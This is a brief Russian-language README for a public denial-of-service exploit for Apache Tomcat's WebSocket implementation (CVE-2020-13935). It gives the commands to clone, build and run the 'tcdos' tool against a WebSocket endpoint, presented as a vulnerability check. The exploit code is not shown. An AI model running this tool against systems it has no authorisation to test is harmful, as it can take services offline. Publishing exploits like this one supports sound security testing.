
Эксплойт для уязвимости WebSocket в Apache Tomcat
В соответствующем посте в блоге подробно объясняется анализ и эксплуатация уязвимости.
Склонируйте репозиторий, затем соберите бинарный файл tcdos. Запустите программу следующим образом, чтобы проверить, уязвима ли конкретная конечная точка WebSocket:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]